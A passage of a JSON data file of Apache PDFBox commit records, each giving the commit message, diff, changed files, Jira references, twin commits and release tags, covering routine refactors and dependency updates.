groupGraphics.getRenderingHints();", + "+ return groupG2D.getRenderingHints();", + " }", + "@@ -466,3 +466,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getStroke();", + "+ return groupG2D.getStroke();", + " }", + "@@ -472,3 +472,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.getTransform();", + "+ return groupG2D.getTransform();", + " }", + "@@ -478,3 +478,3 @@ class GroupGraphics extends Graphics2D", + " {", + "- return groupGraphics.hit(rect, s, onStroke);", + "+ return groupG2D.hit(rect, s, onStroke);", + " }", + "@@ -484,4 +484,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.rotate(theta);", + "- alphaGraphics.rotate(theta);", + "+ groupG2D.rotate(theta);", + "+ alphaG2D.rotate(theta);", + " }", + "@@ -491,4 +491,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.rotate(theta, x, y);", + "- alphaGraphics.rotate(theta, x, y);", + "+ groupG2D.rotate(theta, x, y);", + "+ alphaG2D.rotate(theta, x, y);", + " }", + "@@ -498,4 +498,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.scale(sx, sy);", + "- alphaGraphics.scale(sx, sy);", + "+ groupG2D.scale(sx, sy);", + "+ alphaG2D.scale(sx, sy);", + " }", + "@@ -505,4 +505,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setBackground(color);", + "- alphaGraphics.setBackground(color);", + "+ groupG2D.setBackground(color);", + "+ alphaG2D.setBackground(color);", + " }", + "@@ -512,4 +512,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setComposite(comp);", + "- alphaGraphics.setComposite(comp);", + "+ groupG2D.setComposite(comp);", + "+ alphaG2D.setComposite(comp);", + " }", + "@@ -519,4 +519,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setPaint(paint);", + "- alphaGraphics.setPaint(paint);", + "+ groupG2D.setPaint(paint);", + "+ alphaG2D.setPaint(paint);", + " }", + "@@ -526,4 +526,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setRenderingHint(hintKey, hintValue);", + "- alphaGraphics.setRenderingHint(hintKey, hintValue);", + "+ groupG2D.setRenderingHint(hintKey, hintValue);", + "+ alphaG2D.setRenderingHint(hintKey, hintValue);", + " }", + "@@ -533,4 +533,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setRenderingHints(hints);", + "- alphaGraphics.setRenderingHints(hints);", + "+ groupG2D.setRenderingHints(hints);", + "+ alphaG2D.setRenderingHints(hints);", + " }", + "@@ -540,4 +540,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setStroke(s);", + "- alphaGraphics.setStroke(s);", + "+ groupG2D.setStroke(s);", + "+ alphaG2D.setStroke(s);", + " }", + "@@ -547,4 +547,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.setTransform(tx);", + "- alphaGraphics.setTransform(tx);", + "+ groupG2D.setTransform(tx);", + "+ alphaG2D.setTransform(tx);", + " }", + "@@ -554,4 +554,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.shear(shx, shy);", + "- alphaGraphics.shear(shx, shy);", + "+ groupG2D.shear(shx, shy);", + "+ alphaG2D.shear(shx, shy);", + " }", + "@@ -561,4 +561,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.transform(tx);", + "- alphaGraphics.transform(tx);", + "+ groupG2D.transform(tx);", + "+ alphaG2D.transform(tx);", + " }", + "@@ -568,4 +568,4 @@ class GroupGraphics extends Graphics2D", + " {", + "- groupGraphics.translate(tx, ty);", + "- alphaGraphics.translate(tx, ty);", + "+ groupG2D.translate(tx, ty);", + "+ alphaG2D.translate(tx, ty);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3000": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "626b0cc71a70f865abfc47c38610dd0f78e5a6cb" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3000", + "relevance": 2 + } + ] + }, + { + "commit_id": "4731163226d8ddeccef9f19fdb297b68eb820f66", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526656290, + "hunks": 1, + "message": "PDFBOX-4224: update jbig2 plugin git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1831862 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 8ac30fd28..c1269ac44 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -99,3 +99,3 @@", + " jbig2-imageio", + "- 3.0.0", + "+ 3.0.1", + " test" + ], + "changed_files": [ + "parent/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4224": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "988ff3612de14c204b758f4ddf7f6c1da626b922" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4224", + "relevance": 2 + } + ] + }, + { + "commit_id": "7a304fee6a8c5da93dfa7ceffebe79fd00dc53e6", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527791092, + "hunks": 1, + "message": "PDFBOX-4235: IllegalArgumentException instead of IllegalStateException git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832637 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "index f2973e802..07aa8a326 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", + "@@ -415,3 +415,3 @@ class AppearanceGeneratorHelper", + " {", + "- throw new IllegalStateException(\"font is null, check whether /DA entry is incomplete or incorrect\");", + "+ throw new IllegalArgumentException(\"font is null, check whether /DA entry is incomplete or incorrect\");", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4235": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "9eff016f57f7782f91f63d35ea11aee33303b3ba" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4235", + "relevance": 2 + } + ] + }, + { + "commit_id": "dc8430f73db794ee6528ea4551911c83154cc6f0", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524301933, + "hunks": 0, + "message": "PDFBOX-4189: add lohit-bengali font for upcoming tests and example git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829698 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/resources/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf b/examples/src/main/resources/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf", + "new file mode 100644", + "index 000000000..fa0f51627", + "Binary files /dev/null and b/examples/src/main/resources/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf differ" + ], + "changed_files": [ + "examples/src/main/resources/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "632222236b420218a89d8442719a57fb84224e35" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "92986822c54f759dd990deb27cc8933c1e363d4d", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524466427, + "hunks": 1, + "message": "PDFBOX-4195: force early class loading to check if people forgot to use --add-modules javax.xml.bind git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829822 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/preflight/src/main/java/org/apache/pdfbox/preflight/PreflightDocument.java b/preflight/src/main/java/org/apache/pdfbox/preflight/PreflightDocument.java", + "index 237fac50f..457ac26bb 100644", + "--- a/preflight/src/main/java/org/apache/pdfbox/preflight/PreflightDocument.java", + "+++ b/preflight/src/main/java/org/apache/pdfbox/preflight/PreflightDocument.java", + "@@ -158,2 +158,5 @@ public class PreflightDocument extends PDDocument", + " {", + "+ // force early class loading to check if people forgot to use --add-modules javax.xml.bind", + "+ // on java 9 or later", + "+ javax.xml.bind.DatatypeConverter.parseInt(\"0\");", + " context.setConfig(config);" + ], + "changed_files": [ + "preflight/src/main/java/org/apache/pdfbox/preflight/PreflightDocument.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4195": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "1e292ec2c98edfa9048356174963256bb555b126" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4195", + "relevance": 2 + } + ] + }, + { + "commit_id": "c6e95c0a6ab830e604740607e23916dfb6417943", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523388482, + "hunks": 16, + "message": "PDFBOX-4187: split large method git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1828853 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "index 06f1e7582..7450953a8 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "@@ -55,5 +55,16 @@ public final class LosslessFactory", + " {", + "- int bpc;", + "- PDDeviceColorSpace deviceColorSpace;", + "+ if ((image.getType() == BufferedImage.TYPE_BYTE_GRAY && image.getColorModel().getPixelSize() <= 8)", + "+ || (image.getType() == BufferedImage.TYPE_BYTE_BINARY && image.getColorModel().getPixelSize() == 1))", + "+ {", + "+ return createFromGrayImage(image, document);", + "+ }", + "+ else", + "+ {", + "+ return createFromRGBImage(image, document);", + "+ } ", + "+ }", + "+ private static PDImageXObject createFromGrayImage(BufferedImage image, PDDocument document)", + "+ throws IOException", + "+ {", + " int height = image.getHeight();", + "@@ -61,28 +72,43 @@ public final class LosslessFactory", + " int[] rgbLineBuffer = new int[width];", + "-", + "- if ((image.getType() == BufferedImage.TYPE_BYTE_GRAY && image.getColorModel().getPixelSize() <= 8)", + "- || (image.getType() == BufferedImage.TYPE_BYTE_BINARY && image.getColorModel().getPixelSize() == 1))", + "+ int bpc;", + "+ // grayscale images need one color per sample", + "+ bpc = image.getColorModel().getPixelSize();", + "+ ByteArrayOutputStream baos = new ByteArrayOutputStream(((width*bpc/8)+(width*bpc%8 != 0 ? 1:0))*height);", + "+ MemoryCacheImageOutputStream mcios = new MemoryCacheImageOutputStream(baos);", + "+ for (int y = 0; y < height; ++y)", + " {", + "- // grayscale images need one color per sample", + "- bpc = image.getColorModel().getPixelSize();", + "- ByteArrayOutputStream baos = new ByteArrayOutputStream(((width*bpc/8)+(width*bpc%8 != 0 ? 1:0))*height);", + "- MemoryCacheImageOutputStream mcios = new MemoryCacheImageOutputStream(baos);", + "- for (int y = 0; y < height; ++y)", + "+ for (int pixel : image.getRGB(0, y, width, 1, rgbLineBuffer, 0, width))", + " {", + "- for (int pixel : image.getRGB(0, y, width, 1, rgbLineBuffer, 0, width))", + "- {", + "- mcios.writeBits(pixel & 0xFF, bpc);", + "- }", + "-", + "- int bitOffset = mcios.getBitOffset();", + "- if (bitOffset != 0)", + "- {", + "- mcios.writeBits(0, 8 - bitOffset);", + "- }", + "+ mcios.writeBits(pixel & 0xFF, bpc);", + " }", + "- mcios.flush();", + "- mcios.close();", + "- return prepareImageXObject(document, baos.toByteArray(), ", + "+ int bitOffset = mcios.getBitOffset();", + "+ if (bitOffset != 0)", + "+ {", + "+ mcios.writeBits(0, 8 - bitOffset);", + "+ }", + "+ }", + "+ mcios.flush();", + "+ mcios.close();", + "+ return prepareImageXObject(document, baos.toByteArray(),", + " image.getWidth(), image.getHeight(), bpc, PDDeviceGray.INSTANCE);", + "+ }", + "+", + "+ private static PDImageXObject createFromRGBImage(BufferedImage image, PDDocument document) throws IOException", + "+ {", + "+ int height = image.getHeight();", + "+ int width = image.getWidth();", + "+ int[] rgbLineBuffer = new int[width];", + "+ int bpc = 8;", + "+ PDDeviceColorSpace deviceColorSpace = PDDeviceRGB.INSTANCE;", + "+ byte[] imageData = new byte[width * height * 3];", + "+ int byteIdx = 0;", + "+ int alphaByteIdx = 0;", + "+ int alphaBitPos = 7;", + "+ int transparency = image.getTransparency();", + "+ int apbc = transparency == Transparency.BITMASK ? 1 : 8;", + "+ byte[] alphaImageData;", + "+ if (transparency != Transparency.OPAQUE)", + "+ {", + "+ alphaImageData = new byte[((width * apbc / 8) + (width * apbc % 8 != 0 ? 1 : 0)) * height];", + " }", + "@@ -90,56 +116,29 @@ public final class LosslessFactory", + " {", + "- // RGB", + "- bpc = 8;", + "- deviceColorSpace = PDDeviceRGB.INSTANCE;", + "- byte[] imageData = new byte[width * height * 3];", + "- int byteIdx = 0;", + "- int alphaByteIdx = 0;", + "- int alphaBitPos = 7;", + "- int transparency = image.getTransparency();", + "- int apbc = transparency == Transparency.BITMASK ? 1 : 8;", + "- byte[] alphaImageData;", + "- if (transparency != Transparency.OPAQUE)", + "- {", + "- alphaImageData = new byte[((width * apbc / 8) + (width * apbc % 8 != 0 ? 1 : 0)) * height];", + "- }", + "- else", + "- {", + "- alphaImageData = new byte[0];", + "- }", + "-", + "- for (int y = 0; y < height; ++y)", + "+ alphaImageData = new byte[0];", + "+ }", + "+ for (int y = 0; y < height; ++y)", + "+ {", + "+ for (int pixel : image.getRGB(0, y, width, 1, rgbLineBuffer, 0, width))", + " {", + "- for (int pixel : image.getRGB(0, y, width, 1, rgbLineBuffer, 0, width))", + "+ imageData[byteIdx++] = (byte) ((pixel >> 16) & 0xFF);", + "+ imageData[byteIdx++] = (byte) ((pixel >> 8) & 0xFF);", + "+ imageData[byteIdx++] = (byte) (pixel & 0xFF);", + "+ if (transparency != Transparency.OPAQUE)", + " {", + "- imageData[byteIdx++] = (byte) ((pixel >> 16) & 0xFF);", + "- imageData[byteIdx++] = (byte) ((pixel >> 8) & 0xFF);", + "- imageData[byteIdx++] = (byte) (pixel & 0xFF);", + "- if (transparency != Transparency.OPAQUE)", + "+ // we have the alpha right here, so no need to do it separately", + "+ // as done prior April 2018", + "+ if (transparency == Transparency.BITMASK)", + " {", + "- // we have the alpha right here, so no need to do it separately", + "- // as done prior April 2018", + "- if (transparency == Transparency.BITMASK)", + "+ // write a bit", + "+ alphaImageData[alphaByteIdx] |= ((pixel >> 24) & 1) << alphaBitPos;", + "+ if (--alphaBitPos < 0)", + " {", + "- // write a bit", + "- alphaImageData[alphaByteIdx] |= ((pixel >> 24) & 1) << alphaBitPos;", + "- if (--alphaBitPos < 0)", + "- {", + "- alphaBitPos = 7;", + "- ++alphaByteIdx;", + "- }", + "- }", + "- else", + "- {", + "- // write a byte", + "- alphaImageData[alphaByteIdx++] = (byte) ((pixel >> 24) & 0xFF);", + "+ alphaBitPos = 7;", + "+ ++alphaByteIdx;", + " }", + " }", + "- }", + "- if (transparency == Transparency.BITMASK)", + "- {", + "- // skip boundary if needed", + "- if (alphaBitPos != 7)", + "+ else", + " {", + "- alphaBitPos = 7;", + "- ++alphaByteIdx;", + "+ // write a byte", + "+ alphaImageData[alphaByteIdx++] = (byte) ((pixel >> 24) & 0xFF);", + " }", + "@@ -147,14 +146,21 @@ public final class LosslessFactory", + " }", + "- PDImageXObject pdImage = prepareImageXObject(document, imageData,", + "- image.getWidth(), image.getHeight(), bpc, deviceColorSpace);", + "-", + "- if (transparency != Transparency.OPAQUE)", + "+ if (transparency == Transparency.BITMASK)", + " {", + "- PDImageXObject pdMask = prepareImageXObject(document, alphaImageData,", + "- image.getWidth(), image.getHeight(), apbc, PDDeviceGray.INSTANCE);", + "- pdImage.getCOSObject().setItem(COSName.SMASK, pdMask);", + "+ // skip boundary if needed", + "+ if (alphaBitPos != 7)", + "+ {", + "+ alphaBitPos = 7;", + "+ ++alphaByteIdx;", + "+ }", + " }", + "-", + "- return pdImage;", + "- } ", + "+ }", + "+ PDImageXObject pdImage = prepareImageXObject(document, imageData,", + "+ image.getWidth(), image.getHeight(), bpc, deviceColorSpace); ", + "+ if (transparency != Transparency.OPAQUE)", + "+ {", + "+ PDImageXObject pdMask = prepareImageXObject(document, alphaImageData,", + "+ image.getWidth(), image.getHeight(), apbc, PDDeviceGray.INSTANCE);", + "+ pdImage.getCOSObject().setItem(COSName.SMASK, pdMask);", + "+ }", + "+ return pdImage;", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4187": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "af2c0cab8a6c7552ab78bafcdf2c0592b72d863d" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4187", + "relevance": 2 + } + ] + }, + { + "commit_id": "ec0d0434e02a59e2640a0295c833b81da2f2e05a", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524334039, + "hunks": 1, + "message": "PDFBOX-4071: KCMS no longer available in JDK9 + clarify msg git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829734 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDDeviceRGB.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDDeviceRGB.java", + "index 298bf1525..88665ee03 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDDeviceRGB.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDDeviceRGB.java", + "@@ -137,3 +137,3 @@ public final class PDDeviceRGB extends PDDeviceColorSpace", + "- LOG.info(\"To get higher rendering speed on JDK8 or later,\");", + "+ LOG.info(\"To get higher rendering speed on java 8 oder 9,\");", + " LOG.info(\" use the option -Dsun.java2d.cmm=sun.java2d.cmm.kcms.KcmsServiceProvider\");" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDDeviceRGB.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "c2e4537bff72f6ce86beadab23fa84e50f64254e" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "81bc2f5bf72edd0bc059af77c9a3d7215e456833", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532268229, + "hunks": 2, + "message": "PDFBOX-4274: use the maven enforcer plugin, as suggested by Karl Heinz Marbaise git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836441 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 2858e38ae..134f56ba2 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -52,7 +52,3 @@", + " 1.60", + "- ", + "- ", + "- ", + "- \t3.3.1", + "- \t", + "+ ", + "@@ -169,2 +165,19 @@", + " ", + "+ ", + "+ maven-enforcer-plugin", + "+ ", + "+ ", + "+ ", + "+ enforce", + "+ ", + "+ ", + "+ ", + "+ ", + "+ 3.3.9", + "+ ", + "+ ", + "+ ", + "+ ", + "+ ", + "+ ", + " " + ], + "changed_files": [ + "parent/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4274": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "e5990a7daadf9988f01595313e9fb5319a04a3d7" + ], + [ + "no-tag", + "97dc6271f0cdc15ac649a677387a73ca28886d00" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4274", + "relevance": 2 + } + ] + }, + { + "commit_id": "e215ef8108023d24a1de8d61ccee07af40ed19a3", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523894086, + "hunks": 2, + "message": "PDFBOX-4071: update to current versions git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829292 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 0f75edc71..8ac30fd28 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -109,3 +109,3 @@", + " jai-imageio-core", + "- 1.3.1", + "+ 1.4.0", + " test", + "@@ -223,3 +223,3 @@", + " \t animal-sniffer-maven-plugin", + "-\t 1.14", + "+\t 1.16", + " \t " + ], + "changed_files": [ + "parent/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "9381b16a96c2a254292d4526aed8a652d2fe868c" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "563f4c4870e30e813ed89e9abdd59356d80bef34", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530363166, + "hunks": 1, + "message": "PDFBOX-4071: lessen memory footprint (no array copying) git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834734 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java b/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java", + "index 857550cdd..14b18ba97 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java", + "@@ -95,3 +95,3 @@ public final class COSOutputStream extends FilterOutputStream", + " // flush the entire stream", + "- out.write(buffer.toByteArray());", + "+ buffer.writeTo(out);", + " super.close();" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "97b5d7d696099d866a5f4a6ae888f0b247d19c88" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "e1fbc360fc9955b88cdb09b7ae329e9bebc6ddeb", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523467843, + "hunks": 4, + "message": "PDFBOX-4187: simplify code git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1828915 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "index 0dde8b54f..cf914f2ad 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "@@ -66,2 +66,3 @@ public final class LosslessFactory", + "+ // grayscale images need one color per sample", + " private static PDImageXObject createFromGrayImage(BufferedImage image, PDDocument document)", + "@@ -72,5 +73,3 @@ public final class LosslessFactory", + " int[] rgbLineBuffer = new int[width];", + "- int bpc;", + "- // grayscale images need one color per sample", + "- bpc = image.getColorModel().getPixelSize();", + "+ int bpc = image.getColorModel().getPixelSize();", + " ByteArrayOutputStream baos = new ByteArrayOutputStream(((width*bpc/8)+(width*bpc%8 != 0 ? 1:0))*height);", + "@@ -146,10 +145,8 @@ public final class LosslessFactory", + " }", + "- if (transparency == Transparency.BITMASK)", + "+", + "+ // skip boundary if needed", + "+ if (transparency == Transparency.BITMASK && alphaBitPos != 7)", + " {", + "- // skip boundary if needed", + "- if (alphaBitPos != 7)", + "- {", + "- alphaBitPos = 7;", + "- ++alphaByteIdx;", + "- }", + "+ alphaBitPos = 7;", + "+ ++alphaByteIdx;", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4187": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "6644ddc8a7333011e3e7e6721aa53caebd87356e" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + 